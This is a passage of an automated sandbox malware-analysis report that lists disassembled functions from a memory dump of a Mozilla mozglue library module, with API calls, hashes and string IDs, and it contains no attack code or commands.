                                                                  • Opcode Fuzzy Hash: 7464e3ce61925a0a9f8b6a7d49122166c08eb4ca5d0a7b2b8b579c1464a678dc
                                                                  • Instruction Fuzzy Hash: 8B21AD74B042499BDB04DFD4C890BBEB3F9AF8560CF10442DD8169BB42DB70B906CBA1
                                                                  APIs
                                                                  • _initialize_onexit_table.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C0DE3A4,00000000), ref: 6C08AFBD
                                                                  • _initialize_onexit_table.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C0DE3B0,00000000), ref: 6C08AFCC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: _initialize_onexit_table
                                                                  • String ID: 3JT/
                                                                  • API String ID: 2450287516-2178588373
                                                                  • Opcode ID: 4636ee99324d955873aceffa7e6e6a89c121a21f4373393588d172ccb195697c
                                                                  • Instruction ID: 9da4ec358e501cf9a5bdb0c7c57043574d5076665259508fdca1233402f46c67
                                                                  • Opcode Fuzzy Hash: 4636ee99324d955873aceffa7e6e6a89c121a21f4373393588d172ccb195697c
                                                                  • Instruction Fuzzy Hash: 2A119172E06615AADF01DEA988043DEB7E45F02318F258156DC70ABBC1DA71E5449BA1
                                                                  APIs
                                                                  • calloc.MOZGLUE(?,?), ref: 6C05F19B
                                                                    • Part of subcall function 6C07D850: EnterCriticalSection.KERNEL32(?), ref: 6C07D904
                                                                    • Part of subcall function 6C07D850: LeaveCriticalSection.KERNEL32(?), ref: 6C07D971
                                                                    • Part of subcall function 6C07D850: memset.VCRUNTIME140(?,00000000,?), ref: 6C07D97B
                                                                  • mozalloc_abort.MOZGLUE(?), ref: 6C05F209
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeavecallocmemsetmozalloc_abort
                                                                  • String ID: d$3JT/
                                                                  • API String ID: 3775194440-2248993025
                                                                  • Opcode ID: bf1349ecae2de54092fc5a631e051aa1e0540fa3061125dc3b0267d69d815c74
                                                                  • Instruction ID: dd29b4eb60ed94e400d568adfdfe33f4afdb31ab2f653c4b14a92210bae9315b
                                                                  • Opcode Fuzzy Hash: bf1349ecae2de54092fc5a631e051aa1e0540fa3061125dc3b0267d69d815c74
                                                                  • Instruction Fuzzy Hash: B2116632E0174987EB048F18CA612EEF3FDDF96208B41512DDD05AB611EF30AA84C380
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C098D02
                                                                  • moz_xmalloc.MOZGLUE(00000080,?,6C09D9A8), ref: 6C098D38
                                                                  • InitializeConditionVariable.KERNEL32(00000000,?,?,?,6C09D9A8), ref: 6C098D59
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ConditionCurrentInitializeThreadVariablemoz_xmalloc
                                                                  • String ID: 3JT/
                                                                  • API String ID: 3275805834-2178588373
                                                                  • Opcode ID: 981d35f5f70fa0f9b505ad5aff094096f7079855740488ac0512266c6f8b7958
                                                                  • Instruction ID: 64e532e45022ec136b00429e811271ecf04dfd578b05ea06c100e4572c9ff688
                                                                  • Opcode Fuzzy Hash: 981d35f5f70fa0f9b505ad5aff094096f7079855740488ac0512266c6f8b7958
                                                                  • Instruction Fuzzy Hash: 0821CF30A007058FCB10CF29C4447AAB7F5BF9A308F10892ED98697B10EF70B584CB91
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 6C0BC06F
                                                                  • RtlDuplicateUnicodeString.NTDLL ref: 6C0BC0A1
                                                                  • __Init_thread_footer.LIBCMT ref: 6C0BC0EE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDuplicateInit_thread_footerProcessStringUnicode
                                                                  • String ID: 3JT/
                                                                  • API String ID: 1247259658-2178588373
                                                                  • Opcode ID: b41592108e2ab68e8a4ef5d789b71a476e87a66967a56544fc7203940249987f
                                                                  • Instruction ID: 07d68ee44ec93e74b16168172dee33b510dd2acdc19294a2ca8894b24f3dc6eb
                                                                  • Opcode Fuzzy Hash: b41592108e2ab68e8a4ef5d789b71a476e87a66967a56544fc7203940249987f
                                                                  • Instruction Fuzzy Hash: 2C21B4717402089FDB10EF68CC88B9A77F8EB45759F208139E905A7780DB32B984CB96
                                                                  APIs
                                                                  • _dtest.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C0B9675
                                                                  • _dtest.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C0B968E
                                                                  • ?fromString@Decimal@blink@@SA?AV12@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE(?), ref: 6C0B96F6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: _dtest$?fromD@2@@std@@@D@std@@Decimal@blink@@String@U?$char_traits@V12@V?$allocator@V?$basic_string@
                                                                  • String ID: 3JT/
                                                                  • API String ID: 1331236360-2178588373
                                                                  • Opcode ID: 2ff5e2284189d6a6b4566d877baec41a80abeff644511cb6fe25b5be79cb643f
                                                                  • Instruction ID: 10796ea0babb375ef610dbe4f1ae5c4600c0097b08fa916caf14275835eab18f
                                                                  • Opcode Fuzzy Hash: 2ff5e2284189d6a6b4566d877baec41a80abeff644511cb6fe25b5be79cb643f
                                                                  • Instruction Fuzzy Hash: 91119370A00A058FC715DF39D80569FF7F8EF4A314B40C52DE8AAA7740EB31A159CB96
                                                                  APIs
                                                                  • malloc.MOZGLUE(?), ref: 6C06CA26
                                                                    • Part of subcall function 6C06CAB0: EnterCriticalSection.KERNEL32(?), ref: 6C06CB49
                                                                    • Part of subcall function 6C06CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C06CBB6
                                                                  • mozalloc_abort.MOZGLUE(?), ref: 6C06CAA2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeavemallocmozalloc_abort
                                                                  • String ID: d$3JT/
                                                                  • API String ID: 3517139297-2248993025
                                                                  • Opcode ID: 7478678f3fc8ff387a043d82fcaa230e98e2004ba4b5ab8a9d5bd3323a3607ca
                                                                  • Instruction ID: ed887c1e2c24110ff1608e425bbaa0e286fb0bd95120a828dde3974c724e9987
                                                                  • Opcode Fuzzy Hash: 7478678f3fc8ff387a043d82fcaa230e98e2004ba4b5ab8a9d5bd3323a3607ca
                                                                  • Instruction Fuzzy Hash: 3C11E132E0078897DF01DF69C8102FDF7F4EF96218B459229DD49ABA12EB30A6C4C380
                                                                  APIs
                                                                  • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C060A40), ref: 6C0BB52D
                                                                  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C060A40), ref: 6C0BB556
                                                                  • __Init_thread_footer.LIBCMT ref: 6C0BB569
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: InfoInit_thread_footerProtectSystemVirtual
                                                                  • String ID: 3JT/
                                                                  • API String ID: 1391590832-2178588373
                                                                  • Opcode ID: f6d95df429eda2a618d42f5f7ef5489574eeea15dc92a5195d8697ab7f18e702
                                                                  • Instruction ID: 291715ecbc3ccfab72f73e1a2c62264da077825838b01cc70c3261d691d0445f
                                                                  • Opcode Fuzzy Hash: f6d95df429eda2a618d42f5f7ef5489574eeea15dc92a5195d8697ab7f18e702
                                                                  • Instruction Fuzzy Hash: 8911C431A00605DFCF00DF59D9C4B6AB7F5FB4A318B148529E809A7B41DB32B945CF96
                                                                  APIs
                                                                  • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C093D19
                                                                  • mozalloc_abort.MOZGLUE(?), ref: 6C093D6C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: _errnomozalloc_abort
                                                                  • String ID: d$3JT/
                                                                  • API String ID: 3471241338-2248993025
                                                                  • Opcode ID: fb8842c9458d101a53a3c8195337e3f52642e0453fe17826fcb8005b192ab756
                                                                  • Instruction ID: 047cbcfb60445e123ad90de966096e4c0fc36730bd3d468de1db2875dd6653d8
                                                                  • Opcode Fuzzy Hash: fb8842c9458d101a53a3c8195337e3f52642e0453fe17826fcb8005b192ab756
                                                                  • Instruction Fuzzy Hash: 80110831E0478897DF008B69DC247EDB7B5EF9A218B449218DC4997621EF30A6C4C750
                                                                  APIs
                                                                  • realloc.MOZGLUE(?,?), ref: 6C071A6B
                                                                    • Part of subcall function 6C071AF0: EnterCriticalSection.KERNEL32(?), ref: 6C071C36
                                                                  • mozalloc_abort.MOZGLUE(?), ref: 6C071AE7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalEnterSectionmozalloc_abortrealloc
                                                                  • String ID: d$3JT/
                                                                  • API String ID: 2670432147-2248993025
                                                                  • Opcode ID: 31b9d73688261ac83bc8579caf7258456ba9c676b366478ccf8207be16085865
                                                                  • Instruction ID: ef7cbb06375e9b5550624c2050d28eeb3c62ee005865e40211a6d41d68a03f8a
                                                                  • Opcode Fuzzy Hash: 31b9d73688261ac83bc8579caf7258456ba9c676b366478ccf8207be16085865
                                                                  • Instruction Fuzzy Hash: 8711E322E0074897DF148BA8C8246EEF7B5EF95214F459619ED495B692EB30F6C4C390
                                                                  APIs
                                                                  • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C0B6108
                                                                    • Part of subcall function 6C08FA80: GetCurrentThreadId.KERNEL32 ref: 6C08FA8D
                                                                    • Part of subcall function 6C08FA80: AcquireSRWLockExclusive.KERNEL32(6C0DF448), ref: 6C08FA99
                                                                  • ?writeUnlock@RWLockImpl@detail@mozilla@@IAEXXZ.MOZGLUE ref: 6C0B612B
                                                                    • Part of subcall function 6C08A030: ReleaseSRWLockExclusive.KERNEL32 ref: 6C08A034
                                                                  • ??$AddMarkerToBuffer@UNoPayload@markers@baseprofiler@mozilla@@$$V@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@AAVProfileChunkedBuffer@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UNoPayload@markers@01@@Z.MOZGLUE ref: 6C0B6158
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: LockMarkerProfile$ChunkedExclusive$?profiler_get_core_buffer@baseprofiler@mozilla@@?writeAcquireBlockBufferBuffer@Buffer@1@Buffer@2@Category@1@$$CurrentD@1@Impl@detail@mozilla@@Index@1@Options@1@Payload@markers@01@@Payload@markers@baseprofiler@mozilla@@$$ProfilerReleaseStringThreadUnlock@V@baseprofiler@mozilla@@View@
                                                                  • String ID: 3JT/
                                                                  • API String ID: 2322322896-2178588373
                                                                  • Opcode ID: 86a4016f8e40a246c40bd111a56df28900b6ce744b6622f6adac2ca5168432ee
                                                                  • Instruction ID: 7fab9b240729ad99da2df0636f0aa4611138e1460c89afea26bf26ac6d9e3f01
                                                                  • Opcode Fuzzy Hash: 86a4016f8e40a246c40bd111a56df28900b6ce744b6622f6adac2ca5168432ee
                                                                  • Instruction Fuzzy Hash: CF016DB0A093459FCB44CF68D4803AFBBE4AF89654F54882DD88AD7701D774A888CBD1
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0BAE85
                                                                  • EnterCriticalSection.KERNEL32(6C0DF770,?,6C07C034), ref: 6C0BAE96
                                                                  • LeaveCriticalSection.KERNEL32(6C0DF770,?,?,?,?,6C07C034), ref: 6C0BAEBD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$CurrentEnterLeaveThread
                                                                  • String ID: 3JT/
                                                                  • API String ID: 2351996187-2178588373
                                                                  • Opcode ID: bfa63ad9a79b9d3f3e0d65700612201921e5c4141e6eb1b1b5d6b657b9b59e97
                                                                  • Instruction ID: c5c4daf3d9bb58835dcce7d542c092d0fe0e89e18e8c62cde432fc366be4698f
                                                                  • Opcode Fuzzy Hash: bfa63ad9a79b9d3f3e0d65700612201921e5c4141e6eb1b1b5d6b657b9b59e97
                                                                  • Instruction Fuzzy Hash: 8AF06DB5E002199BCF00AFA8D889AABBBFDEF492157014429E905D7301DB31F908CBA0
                                                                  APIs
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C064A68), ref: 6C09945E
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C099470
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C099482
                                                                    • Part of subcall function 6C099420: __Init_thread_footer.LIBCMT ref: 6C09949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F440
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F44D
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F472
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F489
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C09F491
                                                                  • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C09F4A8
                                                                    • Part of subcall function 6C09F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C09F09B
                                                                    • Part of subcall function 6C09F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C09F0AC
                                                                    • Part of subcall function 6C09F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C09F0BE
                                                                    • Part of subcall function 6C08CBE8: GetCurrentProcess.KERNEL32(?,6C0531A7), ref: 6C08CBF1
                                                                    • Part of subcall function 6C08CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0531A7), ref: 6C08CBFA
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F559
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C09F561
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F577
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F585
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F5A3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ExclusiveLockThread$Timegetenv$AcquireProcessReleaseStampV01@@Value@mozilla@@_getpid$?profiler_time@baseprofiler@mozilla@@Init_thread_footerNow@Stamp@mozilla@@TerminateV12@_
                                                                  • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling$3JT/
                                                                  • API String ID: 200552284-259927438
                                                                  • Opcode ID: e159b18991b168d9683d5ca5a186e558173fc02296ab3fc0c46369b0e3f7ba77
                                                                  • Instruction ID: 1ea085a65d1aea37ebc58102e1958038b9a4635cab146ebbc54f319976dc0f51
                                                                  • Opcode Fuzzy Hash: e159b18991b168d9683d5ca5a186e558173fc02296ab3fc0c46369b0e3f7ba77
                                                                  • Instruction Fuzzy Hash: A1F09031610214CFCF109F69980439977FCEB4A36AF458219ED1593781DF307848C7AA
                                                                  APIs
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C064A68), ref: 6C09945E
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C099470
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C099482
                                                                    • Part of subcall function 6C099420: __Init_thread_footer.LIBCMT ref: 6C09949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F1E0
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F1ED
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F212
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F229
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C09F231
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F2AE
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F2BB
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F2F8
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F350
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F35D
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F381
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F398
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C09F3A0
                                                                  • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C09F3CF
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F440
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F44D
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F472
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F489
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C09F491
                                                                    • Part of subcall function 6C0994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0994EE
                                                                    • Part of subcall function 6C0994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C099508
                                                                  • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C09F248
                                                                    • Part of subcall function 6C09F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C09F09B
                                                                    • Part of subcall function 6C09F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C09F0AC
                                                                    • Part of subcall function 6C09F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C09F0BE
                                                                    • Part of subcall function 6C08CBE8: GetCurrentProcess.KERNEL32(?,6C0531A7), ref: 6C08CBF1
                                                                    • Part of subcall function 6C08CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0531A7), ref: 6C08CBFA
                                                                  • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C09F4A8
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F559
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C09F561
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F577
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F585
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C09F5A3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentExclusiveLock$Thread$AcquireRelease$_getpid$?profiler_time@baseprofiler@mozilla@@Timegetenv$ProcessStampV01@@Value@mozilla@@$Init_thread_footerNow@Stamp@mozilla@@TerminateV12@___acrt_iob_func__stdio_common_vfprintf
                                                                  • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling$3JT/
                                                                  • API String ID: 1267287048-259927438
                                                                  • Opcode ID: e159b18991b168d9683d5ca5a186e558173fc02296ab3fc0c46369b0e3f7ba77
                                                                  • Instruction ID: 2b148f44cc9124ac842a60cab5859d82309936282830d404fba0063fccac61e5
                                                                  • Opcode Fuzzy Hash: e159b18991b168d9683d5ca5a186e558173fc02296ab3fc0c46369b0e3f7ba77
